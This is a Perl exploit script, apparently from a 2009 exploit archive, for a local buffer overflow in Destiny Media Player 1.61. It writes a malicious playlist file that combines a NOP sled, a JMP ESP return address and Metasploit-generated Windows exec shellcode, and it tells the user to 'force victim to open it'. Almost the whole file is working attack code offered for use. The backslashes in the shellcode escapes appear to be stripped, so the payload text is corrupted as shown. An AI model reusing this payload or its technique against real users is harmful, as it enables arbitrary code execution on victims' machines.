#!/user/bin/perl
#Destiny Media Player 1.61 Local BoF Code
#Exploit Coded by : sCORPINo
#Snoop Security Researching Committe 
#originally discovered by: Encrypt3d.M!nd

# windows/exec - 142 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=thread, CMD=calc
$shellcode =
"x6ax1ex59xd9xeexd9x74x24xf4x5bx81x73x13x64" .
"xfcxb1x5dx83xebxfcxe2xf4x98x14xf5x5dx64xfc" .
"x3ax18x58x77xcdx58x1cxfdx5exd6x2bxe4x3ax02" .
"x44xfdx5ax14xefxc8x3ax5cx8axcdx71xc4xc8x78" .
"x71x29x63x3dx7bx50x65x3ex5axa9x5fxa8x95x59" .
"x11x19x3ax02x40xfdx5ax3bxefxf0xfaxd6x3bxe0" .
"xb0xb6xefxe0x3ax5cx8fx75xedx79x60x3fxeex6c" .
"x92x9cxe7x39xefxbax81xd6x24xf0x3ax2dx78x51" .
"x3ax35x6cx75x49xdexa4x96xe1x35x8bx32x51x3d" .
"x0cx64x4fxd7x6axabx4exbax07x9dxddx3ex64xfc" .
"xb1x5d";
$nops = "x90" x 2052;  	 #fill the buffer
$nops2 = "x90" x 100;		 #fill the buffer more:p
$eip = "x65x82xA5x7c";	 #7CA58265 JMP ESP
$attack = $nops.$eip.$nops.$shellcode; #sandwich
$playlist="playlist.lst";    #playlist name,chage it to anything you want
intro();

open($FILE, ">$playlist");
print $FILE $attack;
close($FILE);
print "nnn$playlist created beside this exploit.n";
print "force victim to open it with Destiny Media Player 1.61n";
print "good lucknn";

sub intro{
print qq(
############################################################
##        Snoop Security Researching Committe             ##
##               www.snoop-security.com                   ##
##                    sCORPINo                            ##
## Destiny Media Player 1.61 Local BoF Code               ##
## found by:                                              ##
## http://www.milw0rm.com/exploits/7652                   ##
## special tnX to:                                        ##
## Shahriyar, Adel, Alireza, Yashar and all snoop members ##
## just run and open the playlist.lst with                ##
## Destiny Media Player.then BOOM !                       ##
############################################################
);
}

# www.Syue.com [2009-01-04]